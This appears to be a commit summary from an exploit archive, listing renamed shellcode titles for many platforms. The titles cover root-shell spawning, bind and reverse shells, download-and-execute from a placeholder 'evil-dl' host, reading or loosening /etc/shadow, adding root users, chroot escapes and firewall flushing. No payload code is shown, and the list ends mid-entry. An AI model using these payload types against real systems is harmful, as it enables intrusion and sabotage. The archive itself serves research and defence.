909c94ce89
78 changes to exploits/shellcodes OBS studio 20.1.3 - Local Buffer Overflow OBS Studio 20.1.3 - Local Buffer Overflow Seagate Personal Cloud - Multiple Vulnerabilities AIX - execve /bin/sh Shellcode (88 bytes) AIX - execve(/bin/sh) Shellcode (88 bytes) BSD/PPC - execve /bin/sh Shellcode (128 bytes) BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes) BSD/x86 - execve /bin/sh Shellcode (27 bytes) BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes) BSD/x86 - execve(/bin/sh) Shellcode (27 bytes) BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes) BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes) BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes) BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes) BSDi/x86 - execve /bin/sh Shellcode (45 bytes) BSDi/x86 - execve /bin/sh Shellcode (46 bytes) BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes) FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes) FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1) FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2) FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes) FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2) FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes) FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes) FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes) FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes) FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes) Linux/x86 - execve Null-Free Shellcode (Generator) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x86 - execve() Null-Free Shellcode (Generator) Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator) Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator) HP-UX - execve /bin/sh Shellcode (58 bytes) HP-UX - execve(/bin/sh) Shellcode (58 bytes) Linux/PPC - execve /bin/sh Shellcode (60 bytes) Linux/PPC - execve(/bin/sh) Shellcode (60 bytes) Linux/PPC - execve /bin/sh Shellcode (112 bytes) Linux/PPC - execve(/bin/sh) Shellcode (112 bytes) Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes) Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes) Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes) Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes) Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes) Linux/x86 - execve read Shellcode (92 bytes) Linux/x86 - execve() Read Shellcode (92 bytes) Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes) Linux/x86 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) Shellcode (22 bytes) Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes) Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2) Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes) Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes) Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes) Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes) Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes) Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes) Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes) Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes) Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes) Linux/x86 - setreuid + execve Shellcode (31 bytes) Linux/x86 - setreuid() + execve() Shellcode (31 bytes) Linux/x86 - execve code Shellcode (23 bytes) Linux/x86 - execve() Shellcode (23 bytes) Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes) Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes) BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes) BSD/x86 - symlink . /bin/sh Shellcode (32 bytes) Linux/x86 - execve /bin/sh Shellcode (29 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3) Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - execve(/bin/sh) Shellcode (29 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3) Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) Linux/x86 - execve(/bin/sh) Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes) Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes) Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes) OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes) Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes) Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes) Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes) Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes) Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes) Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes) BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes) Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes) BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) NetBSD/x86 - execve /bin/sh Shellcode (68 bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes) OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) OSX/PPC - execve /bin/sh Shellcode (72 bytes) OSX/PPC - execve(/bin/sh) Shellcode (72 bytes) OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes) OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes) OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes) OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes) Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator) Solaris/SPARC - setreuid + execve Shellcode (56 bytes) Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) Solaris/SPARC - setreuid + execve() Shellcode (56 bytes) Solaris/SPARC - execve /bin/sh Shellcode (52 bytes) Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes) UnixWare - execve /bin/sh Shellcode (95 bytes) Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) UnixWare - execve(/bin/sh) Shellcode (95 bytes) Linux/x86 - execve Shellcode (51 bytes) Linux/x86 - execve() Shellcode (51 bytes) Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes) Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes) Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) Linux/x86 - execve /bin/sh Shellcode (8 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (8 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2) Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes) Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) Linux/x86-64 - execve /bin/sh Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes) Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes) Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes) Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes) Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes) Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM) Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes) OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) OSX - Universal ROP + Reverse TCP Shell Shellcode Linux/MIPS - execve /bin/sh Shellcode (52 bytes) OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) Linux/MIPS - execve /bin/sh Shellcode (48 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes) Linux/x86-64 - execve /bin/sh Shellcode (52 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode Linux/x86 - execve /bin/dash Shellcode (42 bytes) Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) Linux/MIPS - execve /bin/sh Shellcode (36 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes) Linux/x86 - execve /bin/sh Shellcode (35 bytes) Linux/x86 - execve(/bin/sh) Shellcode (35 bytes) Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator) Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes) Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) Linux/x86 - execve /bin/sh Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) Linux/x86 - execve(/bin/sh) Shellcode (26 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1) Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes) Linux/x86 - execve /bin/sh Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) Linux/x86-64 - execve Encoded Shellcode (57 bytes) Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode Linux/x86-64 - execve() Encoded Shellcode (57 bytes) Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes) OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes) Linux/x86 - execve /bin/bash Shellcode (31 bytes) Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x86-64 - execve Shellcode (22 bytes) Linux/x86-64 - execve() Shellcode (22 bytes) Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes) Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes) Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode Linux/x86 - execve /bin/sh Shellcode (19 bytes) Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) OSX/PPC - Remote findsock by recv() Key Shellcode OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode OSX/PPC - Stager Sock Find MSG_PEEK Shellcode OSX/PPC - Stager Sock Find Shellcode OSX/PPC - Stager Sock Reverse Shellcode OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes) OSX/PPC - execve(/bin/sh) Shellcode OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes) OSX/x86 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes) BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes) Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes) Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes) Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode Solaris/SPARC - Bind TCP Shell Shellcode Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes) Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes) OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes) BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes) BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes) BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes) Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes) BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes) BSD/x86 - execve(/bin/sh) Shellcode (28 bytes) Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes) Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes) Linux/x86 - Disable Shadowing Shellcode (42 bytes) Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes) Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes) Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes) Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes) Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes) Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes) Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes) Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes) Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes) Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes) Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes) Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes) Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes) FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes) FreeBSD - reboot() Shellcode (15 Bytes) FreeBSD/x86 - reboot() Shellcode (15 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - 